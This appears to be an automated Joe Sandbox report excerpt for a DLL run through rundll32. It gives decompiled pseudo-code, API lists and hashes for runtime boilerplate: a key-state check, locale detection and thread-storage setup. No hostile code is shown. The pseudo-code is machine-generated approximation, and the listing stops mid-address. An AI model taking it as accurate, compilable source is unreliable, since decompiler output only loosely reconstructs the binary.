                                                                                                                                                                            • Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
                                                                                                                                                                            • Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
                                                                                                                                                                            • Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
                                                                                                                                                                            • Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E1000FF59(void* __ecx) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                            				void* _t15;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            				void* _t19;
                                                                                                                                                                            
                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                            				if((E10012862(__ecx) & 0x40000000) != 0) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t5 = E1000FAB8(_t15, _t15, _t18, __eflags);
                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                            					return  ~( ~_t5);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t19 = E1000A7CE();
                                                                                                                                                                            				if(_t19 == 0) {
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t18 = GetKeyState;
                                                                                                                                                                            				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            			}









                                                                                                                                                                            0x1000ff5c
                                                                                                                                                                            0x1000ff68
                                                                                                                                                                            0x1000ffb0
                                                                                                                                                                            0x1000ffb2
                                                                                                                                                                            0x1000ffb9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ffbb
                                                                                                                                                                            0x1000ff6f
                                                                                                                                                                            0x1000ff73
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ff75
                                                                                                                                                                            0x1000ff82
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ff96
                                                                                                                                                                            0x1000ffa5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ffad

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D
                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 1000FF7D
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 1000FF86
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 1000FF8F
                                                                                                                                                                            • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 1000FFA5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$LongMessageSendWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1063413437-0
                                                                                                                                                                            • Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
                                                                                                                                                                            • Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
                                                                                                                                                                            • Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E1000AA3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                            				struct HINSTANCE__* _t78;
                                                                                                                                                                            				_Unknown_base(*)()* _t79;
                                                                                                                                                                            				struct HINSTANCE__* _t81;
                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                            				signed int _t94;
                                                                                                                                                                            				unsigned int _t97;
                                                                                                                                                                            				void* _t113;
                                                                                                                                                                            				unsigned int _t115;
                                                                                                                                                                            				signed short _t123;
                                                                                                                                                                            				unsigned int _t124;
                                                                                                                                                                            				_Unknown_base(*)()* _t131;
                                                                                                                                                                            				signed short _t133;
                                                                                                                                                                            				unsigned int _t134;
                                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                                            				void* _t144;
                                                                                                                                                                            				int _t145;
                                                                                                                                                                            				int _t146;
                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                            				void* _t167;
                                                                                                                                                                            				signed int _t169;
                                                                                                                                                                            				void* _t170;
                                                                                                                                                                            				int _t172;
                                                                                                                                                                            				signed int _t176;
                                                                                                                                                                            				void* _t177;
                                                                                                                                                                            				CHAR* _t181;
                                                                                                                                                                            				void* _t183;
                                                                                                                                                                            				void* _t184;
                                                                                                                                                                            
                                                                                                                                                                            				_t167 = __edx;
                                                                                                                                                                            				_t184 = _t183 - 0x118;
                                                                                                                                                                            				_t181 = _t184 - 4;
                                                                                                                                                                            				_t73 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_t181[0x118] = _t73 ^ _t181;
                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                            				E10017BC1(E10027E56, __ebx, __edi, __esi);
                                                                                                                                                                            				_t169 = 0;
                                                                                                                                                                            				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                                                                            				 *(_t181 - 0x14) = 0;
                                                                                                                                                                            				 *(_t181 - 0x10) = 0;
                                                                                                                                                                            				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                            				 *(_t181 - 0x18) = _t78;
                                                                                                                                                                            				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                                                                            				if(_t79 == 0) {
                                                                                                                                                                            					if(GetVersion() >= 0) {
                                                                                                                                                                            						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                                                                            						if(_t81 != 0) {
                                                                                                                                                                            							 *(_t181 - 0x14) = 0;
                                                                                                                                                                            							EnumResourceLanguagesA(_t81, 0x10, 1, E1000A1E3, _t181 - 0x14);
                                                                                                                                                                            							if( *(_t181 - 0x14) != 0) {
                                                                                                                                                                            								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                                                                            								_t145 = _t97 & 0x3ff;
                                                                                                                                                                            								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                                                                            								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                                                                            								 *(_t181 - 0x10) = 2;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *(_t181 - 0x18) = 0;
                                                                                                                                                                            						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                                                                            							 *(_t181 - 0x44) = 0x10;
                                                                                                                                                                            							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                                                                            								_t113 = E1001815B( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                                                                            								_t184 = _t184 + 0xc;
                                                                                                                                                                            								if(_t113 == 1) {
                                                                                                                                                                            									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                                                                            									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                                                                            									_t146 = _t115 & 0x3ff;
                                                                                                                                                                            									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                                                                            									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                                                                            									 *(_t181 - 0x10) = 2;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							RegCloseKey( *(_t181 - 0x18));
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                                                                            					 *(_t181 - 0x14) = _t123;
                                                                                                                                                                            					_t124 = _t123 & 0x0000ffff;
                                                                                                                                                                            					_t164 = _t124 & 0x3ff;
                                                                                                                                                                            					 *(_t181 - 0x1c) = _t164;
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                                                                            					 *(_t181 - 0x10) = 2;
                                                                                                                                                                            					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                                                                            					if(_t131 != 0) {
                                                                                                                                                                            						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                                                                            						 *(_t181 - 0x14) = _t133;
                                                                                                                                                                            						_t134 = _t133 & 0x0000ffff;
                                                                                                                                                                            						_t172 = _t134 & 0x3ff;
                                                                                                                                                                            						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                                                                            						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                                                                            						 *(_t181 - 0x10) = 4;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t169 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                                                                            				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                                                                            				_t181[0x105] = 0;
                                                                                                                                                                            				_t181[0x104] = 0;
                                                                                                                                                                            				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                                                                            					_t143 = 0x20;
                                                                                                                                                                            					E100174D0(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                                                                            					 *(_t181 - 0x5c) = _t181;
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                                                                            					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                                                                            					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                                                                            					E1000A1F9(_t181 - 0x3c, 0x10000000, 0xffffffff);
                                                                                                                                                                            					 *(_t181 - 4) = _t169;
                                                                                                                                                                            					if(E1000A2A9(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                                                                            						E1000A2DF(_t181 - 0x3c);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t176 = 0;
                                                                                                                                                                            					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                                                                            						L23:
                                                                                                                                                                            						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                                                                            						E1000A8D0(_t181 - 0x3c);
                                                                                                                                                                            						_t92 = _t169;
                                                                                                                                                                            						goto L24;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							_t94 = E1000A803(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
                                                                                                                                                                            							if(_t94 != _t169) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t176 =  &(1[_t176]);
                                                                                                                                                                            							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L23;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t169 = _t94;
                                                                                                                                                                            						goto L23;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t92 = 0;
                                                                                                                                                                            					L24:
                                                                                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                                                                            					_pop(_t170);
                                                                                                                                                                            					_pop(_t177);
                                                                                                                                                                            					_pop(_t144);
                                                                                                                                                                            					return E100167D5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                                                                            				}
                                                                                                                                                                            			}
































                                                                                                                                                                            0x1000aa3a
                                                                                                                                                                            0x1000aa3b
                                                                                                                                                                            0x1000aa41
                                                                                                                                                                            0x1000aa45
                                                                                                                                                                            0x1000aa4c
                                                                                                                                                                            0x1000aa52
                                                                                                                                                                            0x1000aa59
                                                                                                                                                                            0x1000aa6a
                                                                                                                                                                            0x1000aa71
                                                                                                                                                                            0x1000aa74
                                                                                                                                                                            0x1000aa77
                                                                                                                                                                            0x1000aa7a
                                                                                                                                                                            0x1000aa88
                                                                                                                                                                            0x1000aa8b
                                                                                                                                                                            0x1000aa8f
                                                                                                                                                                            0x1000ab5d
                                                                                                                                                                            0x1000ac19
                                                                                                                                                                            0x1000ac1d
                                                                                                                                                                            0x1000ac31
                                                                                                                                                                            0x1000ac34
                                                                                                                                                                            0x1000ac3e
                                                                                                                                                                            0x1000ac44
                                                                                                                                                                            0x1000ac5c
                                                                                                                                                                            0x1000ac68
                                                                                                                                                                            0x1000ac6d
                                                                                                                                                                            0x1000ac70
                                                                                                                                                                            0x1000ac70
                                                                                                                                                                            0x1000ac3e
                                                                                                                                                                            0x1000ab63
                                                                                                                                                                            0x1000ab77
                                                                                                                                                                            0x1000ab82
                                                                                                                                                                            0x1000ab98
                                                                                                                                                                            0x1000aba7
                                                                                                                                                                            0x1000abbf
                                                                                                                                                                            0x1000abc4
                                                                                                                                                                            0x1000abca
                                                                                                                                                                            0x1000abd6
                                                                                                                                                                            0x1000abd9
                                                                                                                                                                            0x1000abeb
                                                                                                                                                                            0x1000abf7
                                                                                                                                                                            0x1000abfc
                                                                                                                                                                            0x1000abff
                                                                                                                                                                            0x1000abff
                                                                                                                                                                            0x1000abca
                                                                                                                                                                            0x1000ac09
                                                                                                                                                                            0x1000ac09
                                                                                                                                                                            0x1000ab82
                                                                                                                                                                            0x1000aa95
                                                                                                                                                                            0x1000aa9d
                                                                                                                                                                            0x1000aaa0
                                                                                                                                                                            0x1000aaa3
                                                                                                                                                                            0x1000aab5
                                                                                                                                                                            0x1000aabe
                                                                                                                                                                            0x1000aac6
                                                                                                                                                                            0x1000aad3
                                                                                                                                                                            0x1000aad6
                                                                                                                                                                            0x1000aadd
                                                                                                                                                                            0x1000aae1
                                                                                                                                                                            0x1000aae5
                                                                                                                                                                            0x1000aae8
                                                                                                                                                                            0x1000aaeb
                                                                                                                                                                            0x1000aaf8
                                                                                                                                                                            0x1000ab04
                                                                                                                                                                            0x1000ab09
                                                                                                                                                                            0x1000ab0c
                                                                                                                                                                            0x1000ab0c
                                                                                                                                                                            0x1000ab13
                                                                                                                                                                            0x1000ab13
                                                                                                                                                                            0x1000ab18
                                                                                                                                                                            0x1000ab1b
                                                                                                                                                                            0x1000ab32
                                                                                                                                                                            0x1000ab39
                                                                                                                                                                            0x1000ab48
                                                                                                                                                                            0x1000ac7e
                                                                                                                                                                            0x1000ac85
                                                                                                                                                                            0x1000ac95
                                                                                                                                                                            0x1000ac98
                                                                                                                                                                            0x1000ac9b
                                                                                                                                                                            0x1000aca2
                                                                                                                                                                            0x1000aca5
                                                                                                                                                                            0x1000acac
                                                                                                                                                                            0x1000acb8
                                                                                                                                                                            0x1000acc2
                                                                                                                                                                            0x1000acc7
                                                                                                                                                                            0x1000acc7
                                                                                                                                                                            0x1000accc
                                                                                                                                                                            0x1000acd1
                                                                                                                                                                            0x1000acee
                                                                                                                                                                            0x1000acee
                                                                                                                                                                            0x1000acf5
                                                                                                                                                                            0x1000acfa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000acd3
                                                                                                                                                                            0x1000acd3
                                                                                                                                                                            0x1000acda
                                                                                                                                                                            0x1000ace2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ace4
                                                                                                                                                                            0x1000ace8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000acea
                                                                                                                                                                            0x1000acec
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000acec
                                                                                                                                                                            0x1000ab4e
                                                                                                                                                                            0x1000ab4e
                                                                                                                                                                            0x1000acfc
                                                                                                                                                                            0x1000acff
                                                                                                                                                                            0x1000ad07
                                                                                                                                                                            0x1000ad08
                                                                                                                                                                            0x1000ad09
                                                                                                                                                                            0x1000ad1e
                                                                                                                                                                            0x1000ad1e

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1000AA59
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
                                                                                                                                                                            • GetVersion.KERNEL32 ref: 1000AB55
                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000AB7A
                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 1000AB9F
                                                                                                                                                                            • _sscanf.LIBCMT ref: 1000ABBF
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(75144EE0), ref: 1000ABFA
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1000AC09
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
                                                                                                                                                                            • EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
                                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(75144EE0), ref: 1000AC6B
                                                                                                                                                                            • _memset.LIBCMT ref: 1000AC85
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                                                            • API String ID: 434808117-483790700
                                                                                                                                                                            • Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
                                                                                                                                                                            • Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
                                                                                                                                                                            • Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
                                                                                                                                                                            • Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E1001C11B(void* __ebx) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                                                                                            				long _t10;
                                                                                                                                                                            				void* _t11;
                                                                                                                                                                            				int _t12;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                            				long _t26;
                                                                                                                                                                            				void* _t30;
                                                                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            
                                                                                                                                                                            				_t30 = __ebx;
                                                                                                                                                                            				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                                                            				if(_t37 != 0) {
                                                                                                                                                                            					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                                                                            					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                                                                            					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                                                                            					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                                                                            					__eflags =  *0x1005aea4;
                                                                                                                                                                            					_t40 = TlsSetValue;
                                                                                                                                                                            					 *0x1005aeb0 = _t7;
                                                                                                                                                                            					if( *0x1005aea4 == 0) {
                                                                                                                                                                            						L6:
                                                                                                                                                                            						 *0x1005aea8 = TlsGetValue;
                                                                                                                                                                            						 *0x1005aea4 = E1001BDD2;
                                                                                                                                                                            						 *0x1005aeac = _t40;
                                                                                                                                                                            						 *0x1005aeb0 = TlsFree;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags =  *0x1005aea8;
                                                                                                                                                                            						if( *0x1005aea8 == 0) {
                                                                                                                                                                            							goto L6;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags =  *0x1005aeac;
                                                                                                                                                                            							if( *0x1005aeac == 0) {
                                                                                                                                                                            								goto L6;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t7;
                                                                                                                                                                            								if(_t7 == 0) {
                                                                                                                                                                            									goto L6;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t10 = TlsAlloc();
                                                                                                                                                                            					__eflags = _t10 - 0xffffffff;
                                                                                                                                                                            					 *0x10057d30 = _t10;
                                                                                                                                                                            					if(_t10 == 0xffffffff) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						_t11 = 0;
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t12 = TlsSetValue(_t10,  *0x1005aea8);
                                                                                                                                                                            						__eflags = _t12;
                                                                                                                                                                            						if(_t12 == 0) {
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E10018042();
                                                                                                                                                                            							 *0x1005aea4 = E1001BD03( *0x1005aea4);
                                                                                                                                                                            							 *0x1005aea8 = E1001BD03( *0x1005aea8);
                                                                                                                                                                            							 *0x1005aeac = E1001BD03( *0x1005aeac);
                                                                                                                                                                            							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
                                                                                                                                                                            							_t18 = E1001A3D3();
                                                                                                                                                                            							__eflags = _t18;
                                                                                                                                                                            							if(_t18 == 0) {
                                                                                                                                                                            								L14:
                                                                                                                                                                            								E1001BE05();
                                                                                                                                                                            								goto L15;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_push(E1001BF91);
                                                                                                                                                                            								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
                                                                                                                                                                            								__eflags = _t21 - 0xffffffff;
                                                                                                                                                                            								 *0x10057d2c = _t21;
                                                                                                                                                                            								if(_t21 == 0xffffffff) {
                                                                                                                                                                            									goto L14;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t42 = E1001E76E(1, 0x214);
                                                                                                                                                                            									__eflags = _t42;
                                                                                                                                                                            									if(_t42 == 0) {
                                                                                                                                                                            										goto L14;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_push(_t42);
                                                                                                                                                                            										_push( *0x10057d2c);
                                                                                                                                                                            										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                            											goto L14;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_push(0);
                                                                                                                                                                            											_push(_t42);
                                                                                                                                                                            											E1001BE42(_t30, _t37, _t42, __eflags);
                                                                                                                                                                            											_t26 = GetCurrentThreadId();
                                                                                                                                                                            											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                                                            											 *_t42 = _t26;
                                                                                                                                                                            											_t11 = 1;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t11;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					E1001BE05();
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1001c11b
                                                                                                                                                                            0x1001c127
                                                                                                                                                                            0x1001c12b
                                                                                                                                                                            0x1001c14b
                                                                                                                                                                            0x1001c158
                                                                                                                                                                            0x1001c165
                                                                                                                                                                            0x1001c16a
                                                                                                                                                                            0x1001c16c
                                                                                                                                                                            0x1001c173
                                                                                                                                                                            0x1001c179
                                                                                                                                                                            0x1001c17e
                                                                                                                                                                            0x1001c196
                                                                                                                                                                            0x1001c19b
                                                                                                                                                                            0x1001c1a5
                                                                                                                                                                            0x1001c1af
                                                                                                                                                                            0x1001c1b5
                                                                                                                                                                            0x1001c180
                                                                                                                                                                            0x1001c180
                                                                                                                                                                            0x1001c187
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c189
                                                                                                                                                                            0x1001c189
                                                                                                                                                                            0x1001c190
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c192
                                                                                                                                                                            0x1001c192
                                                                                                                                                                            0x1001c194
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c194
                                                                                                                                                                            0x1001c190
                                                                                                                                                                            0x1001c187
                                                                                                                                                                            0x1001c1ba
                                                                                                                                                                            0x1001c1c0
                                                                                                                                                                            0x1001c1c3
                                                                                                                                                                            0x1001c1c8
                                                                                                                                                                            0x1001c29a
                                                                                                                                                                            0x1001c29a
                                                                                                                                                                            0x1001c29a
                                                                                                                                                                            0x1001c1ce
                                                                                                                                                                            0x1001c1d5
                                                                                                                                                                            0x1001c1d7
                                                                                                                                                                            0x1001c1d9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c1df
                                                                                                                                                                            0x1001c1df
                                                                                                                                                                            0x1001c1f5
                                                                                                                                                                            0x1001c205
                                                                                                                                                                            0x1001c215
                                                                                                                                                                            0x1001c222
                                                                                                                                                                            0x1001c227
                                                                                                                                                                            0x1001c22c
                                                                                                                                                                            0x1001c22e
                                                                                                                                                                            0x1001c295
                                                                                                                                                                            0x1001c295
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c230
                                                                                                                                                                            0x1001c230
                                                                                                                                                                            0x1001c241
                                                                                                                                                                            0x1001c243
                                                                                                                                                                            0x1001c246
                                                                                                                                                                            0x1001c24b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c24d
                                                                                                                                                                            0x1001c259
                                                                                                                                                                            0x1001c25b
                                                                                                                                                                            0x1001c25f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c261
